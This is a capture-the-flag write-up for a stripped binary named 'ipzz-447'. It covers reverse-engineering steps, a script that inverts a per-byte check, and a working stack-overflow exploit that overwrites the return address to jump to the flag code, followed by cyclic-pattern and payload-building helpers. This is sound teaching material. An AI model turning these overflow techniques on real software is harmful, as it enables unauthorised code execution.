```
$ strings -n 4 ipzz-447 | head -n 30
Welcome to ipzz-447!
Enter the secret phrase:
Incorrect! Try again.
Correct! Here is your flag:
FLAGexample_placeholder
...
```
The presence of FLAG… in the binary suggests the flag is hard-coded. The goal is therefore either to recover the secret phrase the check expects, or to reach the code that prints the flag without passing the check at all.

Because the binary is stripped (confirm with file, which reports "stripped", and with nm, which prints "no symbols"), we must reverse-engineer the control flow ourselves.
| Technique | When to Use | Quick Checklist |
|-----------|-------------|-----------------|
| Check for stripped binaries | Most CTF binaries are stripped to hide symbols. | file (reports "stripped"), nm (prints "no symbols"), nm -D (imported libc symbols such as gets/puts/strcmp survive stripping). |
| Use IDA/Ghidra for decompilation | When source isn't available. | Locate main via the pointer _start passes to __libc_start_main, then look for strcmp/memcmp-like calls and the functions that reference the prompt strings. |
| Identify constant data | Hard-coded keys, tables, or magic numbers. | strings, objdump -s -j .rodata, Ghidra "Data" view. |
| Model the algorithm in Python | Simple arithmetic/bitwise loops. | Translate decompiled C to Python, compare outputs on known inputs, mask to 8/32 bits where C would wrap. |
| Reverse the transformation | Per-byte bijections (XOR, add, rotate) are directly invertible. | Undo each step in reverse order, or brute-force the small per-byte space. |
| Automate brute-force | When search space ≤ 10⁶–10⁸ and per-iteration cost is low. | itertools.product, multiprocessing.Pool. |
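The "model, then reverse" rows of the table carried through on a hypothetical per-byte check, as an added example (not code from this write-up and not the ipzz-447 routine; the constants KEY, ADD and ROT stand in for values read from the data section). It models the loop, derives the inverse by undoing each step in reverse order, and shows why brute force stays cheap when each output byte depends on only one input byte.

```python
#!/usr/bin/env python3
"""Model a toy per-byte check of the kind a decompiler turns up in a crackme,
then recover the expected input two ways: algebraically and by brute force.
Hypothetical example; the constants below are assumed, not taken from ipzz-447."""

KEY = 0x5A   # assumed: XOR constant read from .rodata
ADD = 0x13   # assumed: additive constant
ROT = 3      # assumed: rotate amount

def rol8(v: int, n: int) -> int:
    n %= 8
    return ((v << n) | (v >> (8 - n))) & 0xFF

def ror8(v: int, n: int) -> int:
    n %= 8
    return ((v >> n) | (v << (8 - n))) & 0xFF

def transform(data: bytes) -> bytes:
    """What the decompiled loop does to each input byte before the memcmp.
    Every step is masked to 8 bits, matching C's unsigned char arithmetic."""
    return bytes((rol8(b ^ KEY, ROT) + ADD) & 0xFF for b in data)

def invert(expected: bytes) -> bytes:
    """Each step is a bijection on one byte, so undo them in reverse order:
    subtract ADD, rotate right, XOR the key."""
    return bytes(ror8((e - ADD) & 0xFF, ROT) ^ KEY for e in expected)

def brute_force(expected: bytes) -> bytes:
    """When deriving the inverse is not worth the effort: because output byte i
    depends only on input byte i, the search is 256 candidates per position
    (256 * n total), not 256 ** n."""
    out = bytearray()
    for e in expected:
        matches = [c for c in range(256) if transform(bytes([c])) == bytes([e])]
        if len(matches) != 1:
            raise ValueError("transform is not a bijection on byte %#x" % e)
        out.append(matches[0])
    return bytes(out)

if __name__ == "__main__":
    # Constructed sample: the blob the binary compares against.
    target_blob = transform(b"s3cret")
    print(invert(target_blob), brute_force(target_blob))
```

If the real loop chains bytes (for example, mixing in the previous output byte), the per-position search still works as long as the chained value is known by the time position i is searched; only a check whose output depends on the whole input at once forces the full product search, which is where the itertools.product/multiprocessing row applies.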
```python
#!/usr/bin/env python3
import struct, sys

buf_size = 64   # size of the stack buffer, from the decompiled function
rbp_size = 8    # saved RBP sits directly above the buffer on x86-64

# address of the instruction that loads the flag address and calls puts
target = 0x4012ac

payload = b'A' * buf_size             # fill the buffer
payload += b'B' * rbp_size            # overwrite saved RBP (value doesn't matter here)
payload += struct.pack("<Q", target)  # new return address (little-endian)

sys.stdout.buffer.write(payload)      # raw bytes, no trailing newline
```
Run the exploit:
```
$ python3 exploit.py | ./ipzz-447
Welcome to ipzz-447!
> Correct! Here is your flag:
FLAGipzz_447_is_solved
```
If the binary uses read(0, buf, 0x100) instead of gets, the same 80-byte payload works: it fits inside the 0x100-byte read and still runs past the 64-byte buffer into the saved RBP and the return address. Only the buffer size itself changes the filler length, so re-read that value from the decompiled function rather than assuming 64. Two things are worth checking before running this: the absolute target address only makes sense for a non-PIE binary (readelf -h must show Type: EXEC, not DYN), and there must be no stack canary between the buffer and the saved RBP. If the process crashes inside libc on a movaps once it reaches the puts call, the usual cause on x86-64 is a misaligned stack, and returning through a single ret gadget first restores the 16-byte alignment.
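Added helpers for the overflow above, to replace the guessed 64 with a measured offset and to check the assumptions the hard-coded return target rests on. This is example code, not part of the original write-up: elf_is_pie reads e_type from a binary's ELF64 header (ET_EXEC vs ET_DYN); cyclic and cyclic_find generate a de Bruijn pattern and map the bytes that land in the saved return slot back to an offset, the way pwntools' cyclic tools do; build_payload then places the target at that offset (64-byte buffer plus 8-byte saved RBP gives 72 for this binary) and refuses a payload containing 0x0a, which gets() would treat as end of input. The 0x4012ac target is the page's; the sample ELF header used below is constructed for illustration.

```python
#!/usr/bin/env python3
"""Offset measurement and payload construction for a stack-smash like the one
above. Example code (not from the write-up); target 0x4012ac and the 72-byte
distance to the return address are the page's figures."""
import struct
import sys

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

def elf_is_pie(header: bytes) -> bool:
    """ELF64 e_type is the little-endian uint16 at offset 16:
    2 = ET_EXEC (fixed load address, absolute return targets are valid),
    3 = ET_DYN (PIE: the 0x4012ac-style target needs a leaked base first)."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if header[4] != 2:
        raise ValueError("only ELF64 handled here")
    (e_type,) = struct.unpack_from("<H", header, 16)
    return e_type == 3

def _de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence B(k, n): every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)
    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)
    yield from db(1, 1)

def cyclic(length: int, alphabet: bytes = ALPHABET, n: int = 4) -> bytes:
    """First `length` bytes of the pattern; send this instead of 'A' * N."""
    out = bytearray()
    for b in _de_bruijn(alphabet, n):
        if len(out) == length:
            break
        out.append(b)
    return bytes(out)

def cyclic_find(value: bytes, max_len: int = 4096,
                alphabet: bytes = ALPHABET, n: int = 4) -> int:
    """Given the bytes found at RSP (or in a register) after the crash, return
    their offset in the pattern, or -1. Only the first n bytes are needed."""
    return cyclic(max_len + n, alphabet, n).find(value[:n])

def build_payload(rip_offset: int, target: int, via_gets: bool = True) -> bytes:
    """Pad up to the saved return address, then overwrite it with `target`."""
    payload = b"A" * rip_offset + struct.pack("<Q", target)
    if via_gets and b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would stop reading there")
    return payload

if __name__ == "__main__":
    # Usage: exploit.py [path-to-binary]  (the path check is optional)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            if elf_is_pie(f.read(64)):
                sys.exit("binary is PIE: an absolute return target will not work")
    # Crash the target with cyclic(200) first; the 8 bytes at RSP give the offset.
    # For ipzz-447 that offset is 64 + 8 = 72.
    sys.stdout.buffer.write(build_payload(72, 0x4012ac))
```

Workflow: run the binary under gdb with cyclic(200) as input, read the 8 bytes at RSP when ret faults, and feed them to cyclic_find; that number replaces buf_size + rbp_size, so a miscounted buffer no longer costs a round of guessing.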